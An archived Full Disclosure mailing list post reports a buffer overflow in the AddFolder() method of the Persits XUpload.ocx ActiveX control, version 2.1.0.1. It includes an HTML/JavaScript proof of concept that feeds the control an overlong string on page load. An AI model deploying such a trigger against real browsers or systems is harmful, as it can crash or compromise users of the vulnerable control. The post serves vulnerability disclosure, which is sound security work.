Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:




fulldisclosure logo Full Disclosure mailing list archives

Persits Software XUpload.ocx Buffer Overflow
From: Elazar Broad <elazarb () earthlink net>
Date: Tue, 25 Dec 2007 14:32:07 -0500 (GMT-05:00)

There is a buffer overflow in the AddFolder() method of the Persists Software XUpload control, version 2.1.0.1. This 
object is marked safe for scripting. Version 3.0(latest) is not vulnerable(throws an error if the parameter is more 
than 256 characters), I have not tested any other versions. A quick Google search for "xupload.ocx" shows that this 
control is widely deployed. PoC as follows:

------------------
<!--
written by e.b.
-->
<html>
 <head>
  <script language="JavaScript" DEFER>
   function Check() {
     var s = 'A';

    while (s.length <= 1380) s = s + 'A';

    obj.AddFolder(s);

   }
  </script>

 </head>
 <body onload="JavaScript: return Check();">
<object id="obj" classid="clsid:E87F6C8E-16C0-11D3-BEF7-009027438003" />
</object>
</body>
</html>
------------------

Elazar

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


  By Date           By Thread  

Current thread:
  • Persits Software XUpload.ocx Buffer Overflow Elazar Broad (Dec 25)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]